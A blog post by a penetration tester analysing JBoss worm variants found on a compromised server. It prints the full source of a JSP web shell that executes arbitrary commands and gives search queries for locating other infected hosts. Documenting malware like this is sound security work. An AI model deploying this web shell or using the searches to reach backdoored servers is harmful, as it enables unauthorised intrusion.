Jboss Worm – other forms spreading #in #jboss #worm

My experience with this worm is basically related to unprotected exposed servers. During a pentest, I own an external facing server, and I see this:

Directory of C:\jboss\server\default\deploy\management
../../2011 11:41 <DIR> .
../../2011 11:41 <DIR> ..
../../2010 04:10 <DIR> console-mgr.sar
../../2011 20:29 <DIR> iddqd.war
../../2011 23:09 <DIR> idssvc.war
../../2011 18:55 <DIR> iesvc.war
../../2010 04:26 <DIR> web-console.war
../../2011 22:22 <DIR> wstats.war
../../2011 19:07 <DIR> zecmd.war

Only web-console .war and console-mgr.sar are standard Jboss deployments; other deployments have beend added through the HTTP Verb Jboss vuln (HEAD use of the jmx-console). Evey deploy is a simple war, with only one jsp with the very same name:

Directory of C:\jboss\server\default\deploy\management\iddqd.war
../../2011 20:29 <DIR> .
../../2011 20:29 <DIR> ..
../../2011 16:44 630 iddqd.jsp
1 File(s) 630 bytes

iddqd.jsp is a simple java web-shell (x.x.x.22 is my server)

iddqd.jsp running net statistics

Here is the source:

<%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION=""> 
<INPUT TYPE="text" NAME="comment"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> 
<% if (request.getParameter("comment") != null) { out.println("Command: " + request.getParameter("comment") + "<BR>");
 Process p = Runtime.getRuntime().exec(request.getParameter("comment")); OutputStream os = p.getOutputStream();
 InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); 
while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> 
</pre> </BODY></HTML>

All wars are built the same: there is the xxx directory (where xxx is the name of the war, as zecmd) and its corresponding jsp (zecmd.jsp), so on my server now there are 5 Java backdoors:

http://x.x.x.22/zecmd/zecmd.jsp
http://x.x.x.22/wstats/wstats.jsp
http://x.x.x.22/iddqd/iddqd.jsp
http://x.x.x.22/idssvc/idssvc.jsp
http://x.x.x.22/iesvc/iesvc.jsp

 

This is it: http://eromang.zataz.com/2011/10/25/jboss-worm-analysis-in-details/ but also iddqd, wstats and zmeu were unknows. Try just google for iddqd.jsp / wstats.jsp (last one is less common…) and you’ll find a third form, zmeu/zmeu.jsp. My problem is that is still there…

http://www.google.com/search?q=zmeu.jsp

http://www.google.com/search?q=iddqd.jsp

http://www.google.com/search?q=%22wstats.jsp%22

http://www.google.com/search?q=%22iesvc.jsp%22

http://www.google.com/search?q=%22zecmd.jsp%22

http://www.google.com/search?q=%22idssvc.jsp%22

 

Advertisements

4 thoughts on “Jboss Worm – other forms spreading #in #jboss #worm

  1. Pingback: Уязвимость JMX Console в JBoss AS 4.x и 5.x at elwood.su

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s